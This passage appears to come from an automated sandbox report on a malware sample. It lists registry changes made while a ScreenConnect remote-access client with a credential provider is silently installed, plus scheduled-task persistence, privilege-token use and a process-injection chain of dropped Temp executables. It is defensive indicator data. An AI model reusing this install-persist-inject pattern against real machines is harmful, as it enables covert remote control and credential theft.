Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.ClientService.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files (x86)\ScreenConnect Client (3be09d9e5e840c20)\ScreenConnect.WindowsClient.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\PackageCode = "F371D3396946D7F0354CFF6462B809A1" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20\shell\open\command C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387} C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\E4BCFB79704FF87AB30ED9E9E548C002\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\ = "ScreenConnect Client (3be09d9e5e840c20) Credential Provider" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Version = "402915332" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ThreadingModel = "Apartment" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductIcon = "C:\\Windows\\Installer\\{933D173F-6496-0F7D-53C4-FF46268B901A}\\DefaultIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\URL Protocol C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsClient.exe\" \"%1\"" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1\Full C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\PackageName = "ScreenConnect.ClientSetup.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\sc-3be09d9e5e840c20 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-3be09d9e5e840c20\UseOriginalUrlEncoding = "1" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\ProductName = "ScreenConnect Client (3be09d9e5e840c20)" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\24.4.4.9118\\3be09d9e5e840c20\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-A613-D378E3178387}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (3be09d9e5e840c20)\\ScreenConnect.WindowsCredentialProvider.dll" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\F371D3396946D7F0354CFF6462B809A1 C:\Windows\system32\msiexec.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10000300101\systemdrive.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\ProgramData\cxqswdu\bsnjgb.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038780101\bce8c2f94e.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038790101\45ab6d7c71.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3P97i.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\10038810101\67e0HNq.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\10038760101\82ca9ecab5.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 856 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 856 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 856 wrote to memory of 3632 N/A C:\Users\Admin\AppData\Local\Temp\daec7b03c98cabb50f94c5ddf9ca7063918b9859291caadaf4cb75f954a4ab30.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe
PID 3632 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 3632 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 3632 wrote to memory of 4008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe
PID 4008 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4008 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 4008 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1J19x2.exe C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
PID 3632 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 3632 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 3632 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\C4O51.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2N2602.exe
PID 2848 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2848 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2848 wrote to memory of 3796 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035600101\MCxU5Fj.exe
PID 2848 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
PID 2848 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
PID 2848 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\Admin\AppData\Local\Temp\10035900101\lWry6QF.exe
